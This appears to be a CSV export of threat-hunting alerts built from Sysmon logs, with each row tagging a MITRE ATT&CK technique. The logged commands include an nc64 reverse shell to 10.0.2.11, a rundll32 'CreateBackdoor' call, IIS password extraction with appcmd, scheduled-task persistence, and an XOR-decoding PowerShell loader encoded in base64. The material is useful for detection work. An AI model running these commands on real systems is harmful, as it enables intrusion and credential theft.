QAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 141993 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-11 23:21:56.654 747F3D96-DE14-5EB9-0000-001079154300 224 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe c:\Users\IEUser\tools\PrivEsc\ NT AUTHORITY\SYSTEM 747F3D96-5461-5EBA-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DE14-5EB9-0000-00107C0F4300 4468 C:\Users\IEUser\Tools\Misc\nc64.exe c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243520 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.533 747F3D96-9F61-5E75-0000-00103D6F1E00 7124 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243520 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.533 747F3D96-9F61-5E75-0000-00103D6F1E00 7124 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 556720 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:01.091 747F3D96-182D-610F-0000-00106F40D300 9932 C:\Windows\SysWOW64\mshta.exe 11.00.17763.1 (WinBuild.160101.0800) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation MSHTA.EXE "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1231-610F-0000-002057A80700 0x7a857 1 Medium SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 747F3D96-1239-610F-0000-0010D0210A00 600 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243520 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.533 747F3D96-9F61-5E75-0000-00103D6F1E00 7124 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1," 1 5 4 1 0 0x8000000000000000 556720 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:01.091 747F3D96-182D-610F-0000-00106F40D300 9932 C:\Windows\SysWOW64\mshta.exe 11.00.17763.1 (WinBuild.160101.0800) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation MSHTA.EXE "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1231-610F-0000-002057A80700 0x7a857 1 Medium SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 747F3D96-1239-610F-0000-0010D0210A00 600 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 556720 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:01.091 747F3D96-182D-610F-0000-00106F40D300 9932 C:\Windows\SysWOW64\mshta.exe 11.00.17763.1 (WinBuild.160101.0800) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation MSHTA.EXE "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1231-610F-0000-002057A80700 0x7a857 1 Medium SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 747F3D96-1239-610F-0000-0010D0210A00 600 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," 1 5 4 1 0 0x8000000000000000 5961 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.433 365ABB72-3D6F-5CEB-0000-00100FC7FF00 2168 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 112972 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-10 00:09:43.370 747F3D96-4647-5EB7-0000-0010B3454B01 7672 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami c:\Users\IEUser\Tools\PrivEsc\ NT AUTHORITY\SYSTEM 747F3D96-3B92-5EB5-0000-0020E7030000 0x3e7 1 System SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-4640-5EB7-0000-0010EF364B01 372 C:\Windows\System32\cmd.exe c:\Windows\System32\cmd.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5958 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.353 365ABB72-3D6F-5CEB-0000-00104FC3FF00 2484 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 5951 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-04 10:16:50.403 747F3D96-B092-5D46-0000-001089041204 7792 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-B091-5D46-0000-001081F71104 820 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," 1 5 4 1 0 0x8000000000000000 424076 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:57:36.394 747F3D96-51D0-5F93-0000-0010B2B35B00 5572 C:\Windows\SysWOW64\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers C:\Users\IEUser\AppData\Local\Temp\tmp1375\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002085A50800 0x8a585 1 High SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A 747F3D96-51D0-5F93-0000-001036A15B00 3396 C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," 3 5 4 3 0 0x8000000000000000 339223 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-07-26 22:13:19.375 747F3D96-FF9D-5F1D-0000-00100AC62400 7400 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 127.0.0.1 MSEDGEWIN10 49796 false 127.0.0.1 MSEDGEWIN10 445 microsoft-ds ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password ),1," 1 5 4 1 0 0x8000000000000000 5955 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.283 365ABB72-3D6F-5CEB-0000-00108FBFFF00 168 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 